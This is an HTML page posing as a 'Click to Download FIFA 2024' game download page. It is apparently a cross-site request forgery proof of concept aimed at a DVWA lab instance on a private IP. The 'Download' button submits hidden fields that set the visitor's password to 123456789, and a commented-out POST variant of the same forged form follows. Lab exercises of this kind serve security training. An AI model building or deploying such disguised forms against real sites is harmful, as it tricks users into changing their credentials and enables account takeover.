<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Click to Download FIFA 2024</title>
   
    <style>
            @import url('https://fonts.googleapis.com/css?family=Montserrat:400,500,600,700|Poppins:400,500&display=swap');
      *{
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        user-select: none;
      }
      .bg-img{
        background: url('https://ik.imagekit.io/brandon1618/bgGame.webp?updatedAt=1726588866656');
        height: 100vh;
        background-size: cover;
        background-position: center;
      }
      .bg-img:after{
        position: absolute;
        content: '';
        top: 0;
        left: 0;
        height: 100%;
        width: 100%;
        background: rgba(0,0,0,0.7);
      }

      .content{
        position: absolute;
        top: 50%;
        left: 50%;
        z-index: 999;
        text-align: center;
        padding: 60px 32px;
        width: 370px;
        transform: translate(-50%,-50%);
        background: rgba(255,255,255,0.04);
        box-shadow: -1px 4px 28px 0px rgba(0,0,0,0.75);
      }
      .content header{
        color: white;
        font-size: 33px;
        font-weight: 600;
        margin: 0 0 35px 0;
        font-family: 'Montserrat',sans-serif;
      }

      .field{
        position: relative;
        height: 45px;
        width: 100%;
        display: flex;
        background: rgba(255,255,255,0.94);
      }
      .field span{
        color: #222;
        width: 40px;
        line-height: 45px;
      }
      .field input{
        height: 100%;
        width: 100%;
        background: transparent;
        border: none;
        outline: none;
        color: #222;
        font-size: 16px;
        font-family: 'Poppins',sans-serif;
      }

      .field input[type="submit"]{
        background: #3498db;
        border: 1px solid #2691d9;
        color: white;
        font-size: 18px;
        letter-spacing: 1px;
        font-weight: 600;
        cursor: pointer;
        font-family: 'Montserrat',sans-serif;
      }
      .field input[type="submit"]:hover{
        background: #2691d9;
      }
    </style>
  </head>
  <body>
    <div class="bg-img">
      <div class="content">
        <header>Click to Download FIFA 2024</header>

        <!--http://10.60.4.63/DVWA/vulnerabilities/csrf/?password_new=123456789&password_conf=123456789&Change=Change#-->
        
        <form target="_blank" action="http://10.60.4.63/DVWA/vulnerabilities/csrf/" method="get">
          
          <div class="field">
            <input type="hidden" name="password_new" value="123456789">
            <input type="hidden" name="password_conf" value="123456789">
            <input type="hidden" name="Change" value="Change">
			      <input type="submit" value="Download">
          </div>
        </form>
      </div>
    </div>


  </body>
</html>


<!--

<form action="http://10.60.4.63/DVWA/vulnerabilities/csrf/" method="post">
    <input type="hidden" name="password_new" value="12345">
    <input type="hidden" name="password_conf" value="12345">
    <input type="submit" name="Change" value="Change">
</form>

-->
